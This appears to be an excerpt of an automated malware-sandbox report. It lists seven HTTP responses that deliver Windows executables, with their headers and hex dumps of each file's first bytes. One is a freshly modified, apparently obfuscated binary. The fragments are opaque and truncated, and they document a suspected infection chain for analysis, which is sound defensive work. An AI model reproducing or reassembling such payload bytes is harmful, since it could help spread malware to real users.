                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:09 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 22:39:09 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:10 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 22:39:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:11 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 22:39:11 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:13 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 22:39:13 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:13 GMTContent-Type: application/octet-streamContent-Length: 1862216Connection: keep-aliveLast-Modified: Tue, 11 Jan 2022 19:12:57 GMTETag: "30e0293-1c6a48-5d5533da9efb0"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8c 32 dc 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 88 0b 00 00 7a 04 00 00 00 00 00 00 00 19 00 00 10 00 00 00 a0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 1a 00 00 04 00 00 5b b2 1c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 64 01 00 00 00 60 16 00 dc 91 02 00 00 00 00 00 00 00 00 00 80 51 1c 00 c8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 40 16 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 74 65 78 74 00 00 00 00 10 00 00 00 50 16 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 dc 91 02 00 00 60 16 00 dc 91 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 00 19 00 ce 78 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:16 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 22:39:16 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 11 Jan 2022 22:39:18 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 12 Jan 2022 22:39:18 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
